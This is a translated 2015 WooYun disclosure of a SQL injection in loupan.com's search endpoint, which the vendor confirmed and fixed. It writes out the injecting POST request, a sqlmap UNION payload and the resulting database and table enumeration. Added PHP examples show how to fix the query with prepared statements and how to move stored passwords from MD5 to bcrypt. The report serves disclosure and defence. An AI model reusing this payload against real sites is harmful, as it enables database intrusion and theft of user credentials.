
Vulnerability summary

Defect ID: wooyun-2015-0141649

Title: SQL injection vulnerability in loupan.com sub-sites

Affected vendor: loupan.com

Author: 霝z

Submitted: 2015-09-16 20:53

Fixed: 2015-11-02 14:06

Published: 2015-11-02 14:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-09-16: Details sent to the vendor; awaiting vendor handling
2015-09-18: Vendor confirmed; details disclosed to the vendor only
2015-09-28: Details disclosed to core white hats and relevant domain experts
2015-10-08: Details disclosed to regular white hats
2015-10-18: Details disclosed to intern white hats
2015-11-02: Details disclosed to the public

Brief description:

Four databases and a large number of account passwords are affected.

Detailed description:

1. Injection point
2. Databases involved
3. Leaked accounts and passwords

1. POST injection point (gz, cq, sh, ... essentially every second-level subdomain has it):

POST /index.php/house/ajax_top_search_data/?s=0.704752029851079 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: */*
Origin: http://cq.loupan.com
Referer: http://cq.loupan.com/
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: cq.loupan.com
Cookie: nom=0; PHPSESSID=jhfoehk3f2j3s62lhkuugreor6; loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227110e0ec90c5ffa5d808db252953f7c7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2214.23.175.62%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+Netsparker%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1442229262%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A59554%3B%7D94fd5d129a521eea870d85fa4d96d619; loadDomain=http%3A%2F%2Fcq.loupan.com%2F; search_keyword_site_id=296
Accept-Encoding: gzip, deflate
Content-Length: 18
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
kw=-1+OR+17-7%3d10


2. Databases involved:

Place: POST
Parameter: kw
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: kw=-1 OR 17-7=10' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7868693a,0x744962577243676a784d,0x3a7263723a), NULL#
---
[13:56:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
[13:56:42] [INFO] fetching database names
available databases [4]:
[*] haiwai
[*] information_schema
[*] loupan2013
[*] wenda


Excerpt of the tables:

Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter |
| lp_admin |
| lp_admin_log |
| lp_admin_permissions |
| lp_admin_roles |
| lp_admin_roles_permissions |
| lp_admin_sites |
| lp_ads |
| lp_ads_pages |
| lp_ads_positions |
| lp_ads_sites |
| lp_attachments |
| lp_broker |
| lp_changelog |
| lp_ci_sessions |
| lp_cities |
| lp_cities_price |
| lp_consultant |
| lp_contact_info |
| lp_customer_purchase_intention |
| lp_dissertation |
| lp_dissertation_model |
| lp_email_bind |
| lp_email_get_password |
| lp_email_validate |
| lp_fangdai_bbs |
| lp_feedback |
| lp_fenxiao_balance |
| lp_fenxiao_balance_application |
| lp_fenxiao_balance_history |
| lp_fenxiao_clients |
| lp_fenxiao_clients_disengagement |
| lp_fenxiao_history |
| lp_fenxiao_new_broker |
| lp_fenxiao_referrals |
| lp_fenxiao_referrals_history |
| lp_fenxiao_site_msg |
| lp_fenxiao_user_collect |
| lp_fenxiao_view |
| lp_fenxiao_xieyi |
| lp_forum |
| lp_friend_categories |
| lp_friend_link_application |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links |
| lp_frontend_pages |
| lp_frontend_pages_extra |
| lp_group_buy |
| lp_group_buy_forms |
| lp_hlink_in_news |
| lp_house_correction |
| lp_houses |
| lp_houses_attributes |
| lp_houses_click_cache |
| lp_houses_comment |
| lp_houses_editor_comment |
| lp_houses_fenxiao |
| lp_houses_info |
| lp_houses_parameters |
| lp_houses_pic_draw |
| lp_houses_pic_effect |
| lp_houses_pic_focus |
| lp_houses_pic_mating |
| lp_houses_pic_model |
| lp_houses_pic_real |
| lp_houses_pic_traffic |
| lp_houses_price_history |
| lp_houses_prices |
| lp_houses_score |
| lp_houses_special |
| lp_houses_telephone_set |
| lp_houses_thumb_cache |
| lp_houses_trend |
| lp_hpyold2new |
| lp_information_gathering |
| lp_loan |
| lp_lottery |
| lp_lottery_type |
| lp_loupandai_msg |
| lp_loupandai_token |
| lp_merchants |
| lp_message |
| lp_news |
| lp_news_backup |
| lp_news_categories |
| lp_news_info |
| lp_news_keywords |
| lp_news_position |
| lp_news_position_relation |
| lp_notice |
| lp_notice_new |
| lp_notice_new_record |
| lp_sites |
| lp_sms |
| lp_sms_queue |
| lp_special_keywords |
| lp_special_keywords_comments |
| lp_special_keywords_old |
| lp_special_keywords_old_related |
| lp_store |
| lp_syn_phone_config |
| lp_telephone_balance |
| lp_telephone_cost |
| lp_telephone_cost_bak |
| lp_telephone_cost_bak201569 |
| lp_telephone_history |
| lp_telephone_queue |
| lp_telephone_recharge_history |
| lp_telephone_set_pool |
| lp_toupiao |
| lp_user_atuo_refresh_templet |
| lp_user_balance |
| lp_user_balance_history |
| lp_user_collect |
| lp_user_combo |
| lp_user_operation_auto_refresh |
| lp_user_operation_promotion |
| lp_user_operation_refresh |
| lp_user_operation_top |
| lp_users |
| lp_users_accepter |
| lp_users_link_accepter |
| lp_users_link_provider |
| lp_users_provider |
| lp_weixin |
| lp_weixin_member |
| lp_weixin_member_pio |
| lp_weixin_message |
| lp_xfbiaoqian |
| lp_youhui_class |
| lp_youhui_list |
+------------------------------------+


3. Leaked account passwords:

[Screenshot: loupan.jpg]


Fortunately they are not plaintext, but the corresponding passwords can be looked up on MD5 lookup sites, so it is best to prompt users to change them.

Proof of vulnerability:

[Screenshot: loupan.jpg]

Fix recommendation:

Filter the parameters.
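Filtering alone is a weak fix; what removes the injection is keeping the keyword out of the SQL text entirely. The following is an added example, not code from loupan.com or from this report. It assumes a PHP 5.3-compatible handler for the POST field kw named in the report, a hypothetical table lp_houses(id, name), and a PDO connection; the DSN, credentials, and the whitelist rule are illustrative choices, not the site's.

```php
<?php
// Added example, not loupan.com's code. Written for PHP 5.3 (no short array
// syntax, no scalar type hints), matching the PHP 5.3.28 the report identified.

// BEFORE: the pattern the report implies. The kw value is spliced into the SQL
// text, so a value such as  -1 OR 17-7=10  changes the structure of the query
// instead of being matched as a keyword.
function topSearchUnsafe(PDO $db, $kw)
{
    $sql = "SELECT id, name FROM lp_houses WHERE name LIKE '%" . $kw . "%' LIMIT 10";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER: validate the keyword, then bind it as data with a prepared statement.
// Binding is the actual fix; the validation only narrows the input surface.
function topSearchSafe(PDO $db, $kw)
{
    $kw = trim($kw);
    // Byte-length cap (UTF-8), avoids needing the mbstring extension.
    if ($kw === '' || strlen($kw) > 150) {
        return array();
    }
    // Hypothetical whitelist: letters (including CJK), digits and spaces only.
    if (!preg_match('/^[\p{L}\p{N} ]+$/u', $kw)) {
        return array();
    }
    // Escape LIKE metacharacters so "%" and "_" in the keyword match literally
    // (MySQL's default LIKE escape character is the backslash).
    $pattern = '%' . addcslashes($kw, '%_\\') . '%';

    $stmt = $db->prepare('SELECT id, name FROM lp_houses WHERE name LIKE :pattern LIMIT 10');
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection settings matter too: with emulated prepares disabled, MySQL parses
// the statement separately from the bound value, so the value can never be
// interpreted as SQL. DSN and credentials here are placeholders.
function connect()
{
    return new PDO(
        'mysql:host=localhost;dbname=loupan2013;charset=utf8',
        'app_user',
        'CHANGE_ME',
        array(
            PDO::ATTR_EMULATE_PREPARES => false,
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        )
    );
}

// Usage in the request handler:
// $rows = topSearchSafe(connect(), isset($_POST['kw']) ? $_POST['kw'] : '');
```

With topSearchSafe, the report's value kw=-1 OR 17-7=10 is rejected by the whitelist; even if the whitelist were removed, it would be sent as a bound string and could only ever match a house name containing that literal text.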

Copyright notice: please credit the source when reposting: 霝z@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-09-18 14:05

Vendor reply:

Already fixed, thank you for your attention. Also, we would ask that the screenshot of the leaked data be blurred more heavily.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-09-22 19:37 | 霝z ( Intern white hat | Rank:83 Vulnerabilities:38 | Wu~~ making progress is what matters most! )

    Thanks for the reminder, will take care in future.
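The report notes that the leaked hashes can be resolved through MD5 lookup sites, which is the expected outcome for unsalted MD5 password storage. The following added example (not loupan.com's code and not part of this report) shows a PHP 5.3.7+-compatible way to replace such hashes with salted bcrypt on the next successful login, using crypt() with the $2y$ prefix because password_hash() only arrived in PHP 5.5. It assumes the stored values are plain 32-character hexadecimal MD5 digests and a hypothetical lp_users(id, password) table; the PDO connection is passed in.

```php
<?php
// Added example, not loupan.com's code. PHP 5.3.7+ (crypt() with $2y$).

// Build a bcrypt hash with a random 22-character salt from the bcrypt alphabet.
function hashPassword($password, $cost = 10)
{
    $raw = openssl_random_pseudo_bytes(16);
    // bcrypt salts use the alphabet ./A-Za-z0-9; base64 uses + and /, so map + to .
    $salt = substr(strtr(base64_encode($raw), '+', '.'), 0, 22);
    $hash = crypt($password, sprintf('$2y$%02d$', $cost) . $salt);
    // A valid bcrypt result is always 60 characters; anything else means the
    // algorithm is unavailable and crypt() fell back or failed.
    if (strlen($hash) !== 60) {
        throw new RuntimeException('bcrypt is not available in this PHP build');
    }
    return $hash;
}

// Verify with a constant-time comparison (hash_equals() only arrived in 5.6).
function verifyPassword($password, $hash)
{
    $candidate = crypt($password, $hash);
    if (strlen($candidate) !== strlen($hash)) {
        return false;
    }
    $diff = 0;
    for ($i = 0, $n = strlen($hash); $i < $n; $i++) {
        $diff |= ord($candidate[$i]) ^ ord($hash[$i]);
    }
    return $diff === 0;
}

// Transparent migration: a stored value of 32 hex characters is treated as a
// legacy MD5 digest. Check it once on login, then overwrite it with bcrypt so
// the legacy hash disappears from the database without a forced reset.
function loginAndUpgrade(PDO $db, $userId, $storedHash, $password)
{
    if (preg_match('/^[0-9a-f]{32}$/i', $storedHash)) {
        if (md5($password) !== strtolower($storedHash)) {
            return false;
        }
        $stmt = $db->prepare('UPDATE lp_users SET password = :hash WHERE id = :id');
        $stmt->bindValue(':hash', hashPassword($password), PDO::PARAM_STR);
        $stmt->bindValue(':id', (int) $userId, PDO::PARAM_INT);
        $stmt->execute();
        return true;
    }
    return verifyPassword($password, $storedHash);
}
```

Accounts that never log in again keep their MD5 digest under this scheme, which is why the report's suggestion to prompt users to change passwords still applies alongside the migration.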